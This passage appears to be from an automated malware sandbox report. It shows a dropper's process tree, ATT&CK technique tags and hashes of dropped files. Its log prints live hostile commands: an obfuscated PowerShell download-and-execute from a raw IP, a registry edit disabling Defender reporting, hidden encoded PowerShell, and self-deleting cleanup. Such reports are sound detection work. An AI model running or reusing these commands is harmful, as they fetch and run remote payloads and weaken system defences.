10⤵
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 428
10⤵
- Program crash
PID:2332

C:\Users\Admin\Pictures\Adobe Films\gyYLkkMWoWl6IPjvS_KkxUiq.exe
"C:\Users\Admin\Pictures\Adobe Films\gyYLkkMWoWl6IPjvS_KkxUiq.exe"
9⤵
PID:3396

C:\Users\Admin\Pictures\Adobe Films\MCbiQHm2FIbji_Ij0_szNgCd.exe
"C:\Users\Admin\Pictures\Adobe Films\MCbiQHm2FIbji_Ij0_szNgCd.exe"
9⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MCbiQHm2FIbji_Ij0_szNgCd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\MCbiQHm2FIbji_Ij0_szNgCd.exe" & del C:\ProgramData\*.dll & exit
10⤵
PID:640

C:\Windows\SysWOW64\taskkill.exe
taskkill /im MCbiQHm2FIbji_Ij0_szNgCd.exe /f
11⤵
- Kills process with taskkill
PID:5876

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
11⤵
- Delays execution with timeout.exe
PID:4740

C:\Users\Admin\Pictures\Adobe Films\ELhUNfu7LDZN33aoWekLIjGu.exe
"C:\Users\Admin\Pictures\Adobe Films\ELhUNfu7LDZN33aoWekLIjGu.exe"
9⤵
PID:480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 636
10⤵
- Program crash
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 664
10⤵
- Program crash
PID:3944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 588
10⤵
- Program crash
PID:5644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 928
10⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 1284
10⤵
- Program crash
PID:3400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 1248
10⤵
- Program crash
PID:5876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ELhUNfu7LDZN33aoWekLIjGu.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\ELhUNfu7LDZN33aoWekLIjGu.exe" & exit
10⤵
PID:6644

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ELhUNfu7LDZN33aoWekLIjGu.exe" /f
11⤵
- Kills process with taskkill
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 1124
10⤵
- Program crash
PID:6952

C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe
"C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe"
9⤵
PID:4420

C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe
"C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe"
10⤵
PID:5988

C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe
"C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe"
10⤵
PID:5048

C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe
"C:\Users\Admin\Pictures\Adobe Films\dpeX7ZOoECYMnlqfr6gd4tYM.exe"
10⤵
PID:5204

C:\Users\Admin\Pictures\Adobe Films\X0mhhdXE9iXFOtfHTLviR6Xl.exe
"C:\Users\Admin\Pictures\Adobe Films\X0mhhdXE9iXFOtfHTLviR6Xl.exe"
9⤵
PID:4808

C:\Users\Admin\AppData\Local\Temp\L70CM.exe
"C:\Users\Admin\AppData\Local\Temp\L70CM.exe"
10⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\CHI26.exe
"C:\Users\Admin\AppData\Local\Temp\CHI26.exe"
10⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\BM0DC.exe
"C:\Users\Admin\AppData\Local\Temp\BM0DC.exe"
10⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\3460CFK5392CI99.exe
https://iplogger.org/1nChi7
10⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\BM0DC.exe
"C:\Users\Admin\AppData\Local\Temp\BM0DC.exe"
10⤵
PID:3944

C:\Users\Admin\Pictures\Adobe Films\XDju8JmIVTrna7FeEWTZVchY.exe
"C:\Users\Admin\Pictures\Adobe Films\XDju8JmIVTrna7FeEWTZVchY.exe"
9⤵
PID:2028

C:\Users\Admin\Pictures\Adobe Films\lIytXljGFF_m4mIuh3Y7LdHQ.exe
"C:\Users\Admin\Pictures\Adobe Films\lIytXljGFF_m4mIuh3Y7LdHQ.exe"
9⤵
PID:4844

C:\Users\Admin\Pictures\Adobe Films\SeCHvdRvNvOy27WUYDXRhHWY.exe
"C:\Users\Admin\Pictures\Adobe Films\SeCHvdRvNvOy27WUYDXRhHWY.exe"
9⤵
PID:2100

C:\Users\Admin\Pictures\Adobe Films\Ps8GPJ2kAU5UJWyaQmQqIr1a.exe
"C:\Users\Admin\Pictures\Adobe Films\Ps8GPJ2kAU5UJWyaQmQqIr1a.exe"
9⤵
PID:1376

C:\Users\Admin\Pictures\Adobe Films\FVThyiZ31LjLct1pip2oaOdh.exe
"C:\Users\Admin\Pictures\Adobe Films\FVThyiZ31LjLct1pip2oaOdh.exe"
9⤵
PID:2332

C:\Users\Admin\Pictures\Adobe Films\BSZfwUxohobBdphSoV5QVqsL.exe
"C:\Users\Admin\Pictures\Adobe Films\BSZfwUxohobBdphSoV5QVqsL.exe"
9⤵
PID:960

C:\Users\Admin\Pictures\Adobe Films\mtrbLzTrpExzegIPSqi2HsJZ.exe
"C:\Users\Admin\Pictures\Adobe Films\mtrbLzTrpExzegIPSqi2HsJZ.exe"
9⤵
PID:620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue183f28acfa3eb3.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:3300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue189a81be91752.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue18b92adfd1a5.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:1040

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue18b92adfd1a5.exe
Tue18b92adfd1a5.exe
8⤵
- Executes dropped EXE
PID:4344

C:\Users\Admin\AppData\Local\Temp\is-PIDKU.tmp\Tue18b92adfd1a5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PIDKU.tmp\Tue18b92adfd1a5.tmp" /SL5="$70056,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue18b92adfd1a5.exe"
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue18f779a8ab63f6f0f.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:2604

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue18f779a8ab63f6f0f.exe
Tue18f779a8ab63f6f0f.exe
8⤵
- Executes dropped EXE
- Modifies system certificate store
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 1032
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue185ad056d9dcafc86.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:4780

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue185ad056d9dcafc86.exe
Tue185ad056d9dcafc86.exe
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:4152

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue185ad056d9dcafc86.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue185ad056d9dcafc86.exe" -u
9⤵
- Executes dropped EXE
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 580
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 620 -s 464
2⤵
- Program crash
PID:5324

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue183f28acfa3eb3.exe
Tue183f28acfa3eb3.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4584

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue189a81be91752.exe
Tue189a81be91752.exe
1⤵
- Executes dropped EXE
PID:4352

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue184d028e1c98311.exe
Tue184d028e1c98311.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1308 -ip 1308
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5012 -ip 5012
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4716 -ip 4716
1⤵
PID:5176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2332 -ip 2332
1⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
1⤵
PID:5544

C:\Windows\SysWOW64\cmd.exe
cmd
2⤵
PID:3440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 464
1⤵
- Program crash
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4716 -ip 4716
1⤵
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2100 -ip 2100
1⤵
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 472
1⤵
- Program crash
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2056 -ip 2056
1⤵
PID:5900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 364 -ip 364
1⤵
PID:6016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5144 -ip 5144
1⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 472
1⤵
- Program crash
PID:5816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 364 -ip 364
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 480 -ip 480
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 960 -ip 960
1⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 620 -ip 620
1⤵
PID:4328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 484
1⤵
- Program crash
PID:5980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 464
1⤵
- Program crash
PID:892

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
1⤵
PID:1880

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
2⤵
- Kills process with taskkill
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 480
1⤵
- Program crash
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2100 -ip 2100
1⤵
PID:2840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 480 -ip 480
1⤵
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2332 -ip 2332
1⤵
PID:2424

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
1⤵
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 480 -ip 480
1⤵
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2808 -ip 2808
1⤵
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2056 -ip 2056
1⤵
PID:1864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5144 -ip 5144
1⤵
PID:5336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 960 -ip 960
1⤵
PID:3664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 620 -ip 620
1⤵
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1212 -ip 1212
1⤵
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 480 -ip 480
1⤵
PID:6104

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:876

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
1⤵
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2808 -ip 2808
1⤵
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 480 -ip 480
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4424 -ip 4424
1⤵
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2808 -ip 2808
1⤵
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 480 -ip 480
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4424 -ip 4424
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5784 -ip 5784
1⤵
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4424 -ip 4424
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 480 -ip 480
1⤵
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5016 -ip 5016
1⤵
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5784 -ip 5784
1⤵
PID:6272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 480 -ip 480
1⤵
PID:6672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4424 -ip 4424
1⤵
PID:6620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5784 -ip 5784
1⤵
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4424 -ip 4424
1⤵
PID:956

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:7096

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 600
3⤵
- Program crash
PID:5440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4488 -ip 4488
1⤵
PID:6436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4424 -ip 4424
1⤵
PID:6920

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 528 -p 6500 -ip 6500
1⤵
PID:5004

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 4936 -ip 4936
1⤵
PID:1580

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 6756 -ip 6756
1⤵
PID:6632

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 6000 -ip 6000
1⤵
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 6192 -ip 6192
1⤵
PID:6432

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 688 -p 6372 -ip 6372
1⤵
PID:5140

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:6720

C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\temp\bvgn2lkk.vbs
2⤵
PID:536

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\temp\bvgn2lkk.vbs"
3⤵
PID:4508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $WW1='{~}(N{~}e{~}{~}w{~}-Ob{~}j{~}e';$WW2='c{~}{~}t{~} S{~}ys{~}{~}t{~}e';$WW3='m{~}.N{~}e{~}{~}t.{~}W{~}e{~}{~}b{~}C{~}li{~}e{~}n';$WW4='t{~}).{~}D{~}{~}o{~}wn{~}{~}lo{~}a';$WW5='d{~}Fi{~}{~}l{~}{~}e';$LL='(''h{~}tt{~}{~}p{~}:/{~}/{~}6{~}2.204.41.192/AMSI/css.b{~}a{~}t'',''{~}C{~}:{~}\{~}Pr{~}ogramData\css.b{~}a{~}t'');';$OK=($WW1,$WW2,$WW3,$WW4,$WW5,$LL -Join '');$OK=$OK.replace('{~}','');I`E`X $OK|I`E`X;
4⤵
PID:5532

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cmstp.exe /F
2⤵
- Kills process with taskkill
PID:6184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6192 -ip 6192
1⤵
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6192 -ip 6192
1⤵
PID:7060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6192 -ip 6192
1⤵
PID:5404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\10ef9331996d.exe
MD5
1b6d85c3c56d3e9b053ed5112af4e162

SHA1
a840dea141296a67c6cc2d5b6a48e6607aa043b1

SHA256
4ddb979458cdf381ce476232509705b8f2e15db8480e4c98da062dba9541a845

SHA512
35fdfa2c5e0a21e0f9d1ffd72210d16f33b5f7a13bdbe704f77e0cf74f2b815081a879350e3be443cc184dfe876a6f2f239701f75039d86cf798350ae0254dbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\10ef9331996d.exe
MD5
1b6d85c3c56d3e9b053ed5112af4e162

SHA1
a840dea141296a67c6cc2d5b6a48e6607aa043b1

SHA256
4ddb979458cdf381ce476232509705b8f2e15db8480e4c98da062dba9541a845

SHA512
35fdfa2c5e0a21e0f9d1ffd72210d16f33b5f7a13bdbe704f77e0cf74f2b815081a879350e3be443cc184dfe876a6f2f239701f75039d86cf798350ae0254dbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue183f28acfa3eb3.exe
MD5
c407f33c45da1fee0b41e151c369e7a5

SHA1
610f443dc3e1d3ecd1fdbc39c21b1f2176538324

SHA256
2fb200db6b997f0b50dd97edbbcfc4f30565fe5303beb93b6eb53f647ce44b1d

SHA512
ab05c88bc203b5d1662613c2d54f6f7c990f2952db1b9529c9346b20ae5aab316f0131b4de2cdd964e234ae9bda088e89223b5957978a42c1b7b7170ac5f302a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue183f28acfa3eb3.exe
MD5
c407f33c45da1fee0b41e151c369e7a5

SHA1
610f443dc3e1d3ecd1fdbc39c21b1f2176538324

SHA256
2fb200db6b997f0b50dd97edbbcfc4f30565fe5303beb93b6eb53f647ce44b1d

SHA512
ab05c88bc203b5d1662613c2d54f6f7c990f2952db1b9529c9346b20ae5aab316f0131b4de2cdd964e234ae9bda088e89223b5957978a42c1b7b7170ac5f302a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue184d028e1c98311.exe
MD5
369bff77587fc199940a3ad5050398b1

SHA1
21a75c9856c57d71d0435e72b6439d935aeb695d

SHA256
8fdfaa3e5cda057c8736c72c5e124f37801e7bf2f25c0c8d37f8351cc42224e5

SHA512
8e529906c310e842136467409f0c54027c9c1013ac85fc36f817387c2f8702769ea51fa2556f4fae05d27cb19d5b4f15323d5f4c700c29bcd17e2adc6a3450f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue184d028e1c98311.exe
MD5
369bff77587fc199940a3ad5050398b1

SHA1
21a75c9856c57d71d0435e72b6439d935aeb695d

SHA256
8fdfaa3e5cda057c8736c72c5e124f37801e7bf2f25c0c8d37f8351cc42224e5

SHA512
8e529906c310e842136467409f0c54027c9c1013ac85fc36f817387c2f8702769ea51fa2556f4fae05d27cb19d5b4f15323d5f4c700c29bcd17e2adc6a3450f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue18514cc6c2a3d5.exe
MD5
0462336299da5de1cebe25b3212c637c

SHA1
fe8afd7ef27b09b380ab40714f02f300475bfddd

SHA256
fb6cdeca45534708b5438cad6df3126daf7cc86f1235b62302717e8b8025183f

SHA512
8d3e7f91bcf468eb809d4d4d356509fd9cc9c51b877c9351fd2a4168622af43500e6bf4a7c880f0d3b881bc63f22326b510147f835ffa8d2715335e2c7676fa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue18514cc6c2a3d5.exe
MD5
0462336299da5de1cebe25b3212c637c

SHA1
fe8afd7ef27b09b380ab40714f02f300475bfddd

SHA256
fb6cdeca45534708b5438cad6df3126daf7cc86f1235b62302717e8b8025183f

SHA512
8d3e7f91bcf468eb809d4d4d356509fd9cc9c51b877c9351fd2a4168622af43500e6bf4a7c880f0d3b881bc63f22326b510147f835ffa8d2715335e2c7676fa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue185ad056d9dcafc86.exe
MD5
030234b17d0a169c7db533413d772bfb

SHA1
7276a6ba1834b935a3e5c5c32ffba11b2c7370a8

SHA256
cf50eb23361fe4eba129a7cf638010d7ec322ea9b0f09dce8dc5f868c974d945

SHA512
0980984d3b0ca85b738ad5c5070ae0f7e9898dd2a5e33de73c836565f4d728e0329c2e4ef948f09434c71b596ebe1313ca238a19bc4a42955136899f417d50f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue185ad056d9dcafc86.exe
MD5
030234b17d0a169c7db533413d772bfb

SHA1
7276a6ba1834b935a3e5c5c32ffba11b2c7370a8

SHA256
cf50eb23361fe4eba129a7cf638010d7ec322ea9b0f09dce8dc5f868c974d945

SHA512
0980984d3b0ca85b738ad5c5070ae0f7e9898dd2a5e33de73c836565f4d728e0329c2e4ef948f09434c71b596ebe1313ca238a19bc4a42955136899f417d50f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue185ad056d9dcafc86.exe
MD5
030234b17d0a169c7db533413d772bfb

SHA1
7276a6ba1834b935a3e5c5c32ffba11b2c7370a8

SHA256
cf50eb23361fe4eba129a7cf638010d7ec322ea9b0f09dce8dc5f868c974d945

SHA512
0980984d3b0ca85b738ad5c5070ae0f7e9898dd2a5e33de73c836565f4d728e0329c2e4ef948f09434c71b596ebe1313ca238a19bc4a42955136899f417d50f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue1885a39914.exe
MD5
b0f998e526aa724a696ccb2a75ff4f59

SHA1
c1aa720cc06c07acc8141fab84cdb8f9566c0994

SHA256
05e2540b7113609289ffb8ccdcb605aa6dac2873dcce104c43fbd4b7f58b8898

SHA512
ea7388083b8f4ef886d04d79a862ad1d6f9ecb94af1267a9ae0932dbc10ef1046b8e235972eab2a4741df52981094a81329f107e6e44adebdf9e95d7c778d55b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue1885a39914.exe
MD5
b0f998e526aa724a696ccb2a75ff4f59

SHA1
c1aa720cc06c07acc8141fab84cdb8f9566c0994

SHA256
05e2540b7113609289ffb8ccdcb605aa6dac2873dcce104c43fbd4b7f58b8898

SHA512
ea7388083b8f4ef886d04d79a862ad1d6f9ecb94af1267a9ae0932dbc10ef1046b8e235972eab2a4741df52981094a81329f107e6e44adebdf9e95d7c778d55b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue189a81be91752.exe
MD5
e113dae909b8fe86578d8558326d626b

SHA1
28d21842fce5df5dee1704eb4c28388c44860a53

SHA256
6e42b651324f4b813fc623bfd8ad7862ae425123d1b84f9c9dd6da6b45bc9f11

SHA512
d52e53d1c9d3f69d9651843c311c24de9d9b49e7ed7324bc42ce39a13c41ade20d95f1e3e519ce4e3a87cc3310340e582d76de788d6e39e4976e98dd4d3c3bd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue189a81be91752.exe
MD5
e113dae909b8fe86578d8558326d626b

SHA1
28d21842fce5df5dee1704eb4c28388c44860a53

SHA256
6e42b651324f4b813fc623bfd8ad7862ae425123d1b84f9c9dd6da6b45bc9f11

SHA512
d52e53d1c9d3f69d9651843c311c24de9d9b49e7ed7324bc42ce39a13c41ade20d95f1e3e519ce4e3a87cc3310340e582d76de788d6e39e4976e98dd4d3c3bd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue18b92adfd1a5.exe
MD5
8887a710e57cf4b3fe841116e9a0dfdd

SHA1
8c1f068d5dda6b53db1c0ba23fd300ac2f2197c4

SHA256
e045b4a1c9f6640814f6e39903e1f03f2c7f1e3b3d1c6dbf07a409732655eff4

SHA512
